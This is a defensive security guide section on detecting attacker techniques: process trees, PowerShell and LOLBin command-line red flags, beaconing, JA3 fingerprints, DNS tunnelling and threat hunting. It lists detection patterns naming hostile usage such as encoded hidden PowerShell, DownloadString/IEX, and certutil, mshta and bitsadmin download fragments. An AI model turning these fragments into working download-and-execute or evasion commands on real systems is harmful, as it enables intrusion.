Detection Strategies: Catching Attackers

Understanding offensive techniques lets you build better defenses. This section covers how defenders can detect the techniques described in this guide.

The Detection Challenge

Sophisticated attackers design their operations to evade detection:

• Traffic blends with legitimate business activity
• Tools are Microsoft-signed binaries (LOLBins)
• Activity happens in short bursts, not continuously
• Encryption hides content from inspection
• Infrastructure uses legitimate cloud services

Detection requires looking beyond simple signatures. It's about behavioral analysis, anomaly detection, and understanding what "normal" looks like.

Behavioral Detection

Instead of looking for specific malware, look for suspicious behaviors.

Process Lineage Analysis

The most powerful detection: track parent-child process relationships.

NORMAL PROCESS TREE:                    SUSPICIOUS PROCESS TREE:
═══════════════════                     ═══════════════════════

explorer.exe                            outlook.exe
    └─ chrome.exe                           └─ cmd.exe
           └─ chrome.exe (render)                   └─ powershell.exe
                                                            └─ certutil.exe

User clicks Chrome icon,                Email client spawning shells?
Chrome spawns render processes.         PowerShell downloading files?
Expected behavior.                      HIGHLY SUSPICIOUS.

winword.exe                             excel.exe
    └─ (no children normally)               └─ mshta.exe
                                                └─ powershell.exe
Word opened, user editing document.
No child processes.                     Excel spawning HTA then PowerShell?
Expected behavior.                      ALMOST CERTAINLY MALICIOUS.
                    

Key Detection Rules

Command Line Analysis

Even legitimate tools become suspicious with certain arguments.

PowerShell Red Flags

# High-confidence malicious indicators:

-enc, -EncodedCommand     # Base64 encoded command
-ep bypass                # Execution policy bypass
-w hidden                 # Hidden window
-nop, -NoProfile          # Skip profile loading
-noni, -NonInteractive    # No interactive prompts

DownloadString            # Downloading code from URL
IEX, Invoke-Expression    # Executing downloaded code
Net.WebClient             # Web downloading class
FromBase64String          # Decoding operations
Invoke-Mimikatz           # Credential dumping (duh)

# Combination rule (very high confidence):
powershell.exe -ep bypass -w hidden -enc [base64...]
# This is almost NEVER legitimate

LOLBin Abuse Patterns

# certutil.exe
certutil -urlcache -f http    # Downloading files
certutil -decode              # Decoding payloads

# mshta.exe
mshta http://                 # Loading remote HTAs
mshta vbscript:               # Inline script execution
mshta javascript:             # Inline script execution

# bitsadmin.exe
bitsadmin /transfer           # Downloading files
bitsadmin /setnotifycmdline   # Command execution on complete

# wmic.exe
/node:                        # Remote execution
process call create           # Process creation
/format:http                  # Loading remote XSL

# rundll32.exe
javascript:                   # Script execution
shell32.dll,ShellExec_RunDLL  # Executing URLs

Network-Based Detection

Beaconing Detection

Even with jitter, beaconing creates statistical patterns over time.

# Collect connection data over 7+ days

For each (source_ip, destination) pair:
    Calculate:
    - Connection count
    - Mean interval between connections
    - Standard deviation of intervals
    - Coefficient of variation (StdDev / Mean)

# Beaconing indicators:
- High connection count to single destination
- Relatively consistent intervals (low CoV despite jitter)
- Connections during non-business hours
- 24/7 connectivity pattern
- First-ever connection to this destination

JA3 Fingerprinting

TLS handshakes create unique fingerprints. Known C2 tools have known JA3 hashes.

# JA3 = MD5(SSLVersion,Ciphers,Extensions,EllipticCurves,ECPointFormats)

Known malicious JA3 hashes (examples - these change):
- Cobalt Strike: 72a589da586844d7f0818ce684948eea
- Metasploit: 3b5074b1b5d032e5620f69f9f700ff0e
- Empire: 1aa7bf8b97e540ca5edd75f7b8384bfa

# Detection:
1. Capture TLS handshakes at network edge
2. Calculate JA3 hash for each connection
3. Compare against threat intel JA3 lists
4. Alert on matches

DNS Analytics

# Indicators of DNS tunneling:

1. High volume of queries to single domain
   Normal: 10-50 queries/day to google.com
   Suspicious: 10,000 queries/day to weird-domain.com

2. Long subdomain strings (encoded data)
   Normal: www.example.com
   Suspicious: dGhpcyBpcyBlbmNvZGVkIGRhdGE.evil.com (base64)

3. High entropy in subdomains
   Normal: mail, www, api (low entropy, readable)
   Suspicious: x8kf92mdk3 (high entropy, random-looking)

4. TXT record queries
   Normal: Rare from workstations
   Suspicious: Many TXT queries from single host

5. Queries to newly registered domains
   Domains < 30 days old are suspicious

Network Baseline Comparison

# Build baseline for each host/user:

Host: WORKSTATION-15
User: jsmith
Normal destinations: office365.com, salesforce.com, slack.com
Normal hours: 9am-6pm
Normal volume: 50-200MB/day
Normal protocols: HTTP, HTTPS, DNS

# Alert on deviations:
□ New destination never seen before
□ Destination not seen elsewhere in org
□ Traffic during unusual hours (3am?)
□ Traffic while user is on vacation
□ Unusual volume (2GB upload overnight?)
□ Unusual protocol (SSH from workstation?)

Endpoint Detection (EDR)

Modern EDR watches behavior, not just signatures.

Critical Telemetry Sources

Enabling PowerShell Logging

# Group Policy settings to enable:

Computer Configuration
  → Administrative Templates
    → Windows Components
      → Windows PowerShell

1. Turn on Module Logging
   Log modules: *

2. Turn on Script Block Logging
   Log script block invocation start/stop events: Enabled

3. Turn on PowerShell Transcription
   Transcript output directory: \\server\share\transcripts
   Include invocation headers: Enabled

# These settings capture:
- Every PowerShell command executed
- Decoded commands (even -enc ones!)
- Full script contents
- Who ran what, when, where

Key Questions Defenders Should Ask

How do defenders detect beaconing over HTTPS to legitimate domains?

You can't see inside the encryption, but you can see:

• Timing patterns: Statistical analysis reveals periodicity despite jitter
• JA3/JA3S fingerprints: TLS handshake parameters identify specific tools
• Request/response ratios: C2 often has unusual symmetry vs. normal browsing
• Connection frequency: Regular connections to "new" domains
• DNS analytics: Resolving domains registered recently

What does "normal" look like and how do you baseline?

Building baselines requires:

• NetFlow/IPFIX data: Every connection logged (src, dst, port, bytes, duration)
• UEBA: User and Entity Behavior Analytics building per-host/per-user profiles
• Application inventory: Know which apps should phone home where
• Time: Takes weeks/months to build good baselines

Once baselined, new C2 infrastructure stands out because it's new.

What metadata gives attackers away without TLS inspection?

• Certificate details: Self-signed? Issued yesterday? Subject mismatch?
• Destination IP reputation: Threat intel feeds, passive DNS history
• Timing: Long connections or precise interval reconnections
• Volume: Large uploads during unusual hours
• Server Name Indication (SNI): Mismatches between SNI and actual content

How does EDR detect living off the land?

This is hard, which is why LOLBins work. But EDR looks at:

• Process lineage: Abnormal parent-child relationships
• Command-line arguments: Known malicious patterns
• Behavior sequences: rundll32 making network connections, mshta running scripts
• Script Block Logging: Captures decoded PowerShell before execution
• Rare events: certutil downloading files is almost never legitimate

Threat Hunting

Proactive searching for compromise indicators, rather than waiting for alerts.

Hunting Hypotheses

# Hypothesis-driven hunts:

Hypothesis: "Attackers are using scheduled tasks for persistence"
Hunt:
- Query all scheduled tasks across endpoints
- Filter for tasks created in last 30 days
- Filter for tasks running PowerShell, cmd, mshta, wscript
- Review command lines for suspicious patterns
- Check if task creator matches expected admin processes

Hypothesis: "Beaconing is occurring over HTTPS to cloud services"
Hunt:
- Aggregate connections to AWS/Azure/GCP/Cloudflare IPs
- Look for hosts with unusually high connection counts
- Look for connections with regular intervals
- Cross-reference with known good application list

Hypothesis: "Credential dumping has occurred via LSASS access"
Hunt:
- Search for processes accessing lsass.exe memory
- Filter out known legitimate (AV, security tools)
- Look for unknown processes or tools like mimikatz
- Check for suspicious process lineage

IOC Sweeps

# When new threat intel arrives, sweep the environment:

New IOC received: malicious domain cdn-analytics-prod.com

Sweep actions:
1. Query DNS logs for any resolution of this domain
2. Query proxy logs for any connection to this domain
3. Query endpoint telemetry for network connections to this domain
4. Query SIEM for any historical references

If found:
- Identify affected hosts
- Capture forensic images
- Investigate scope of compromise
- Begin incident response

Detection Tools

Detection Summary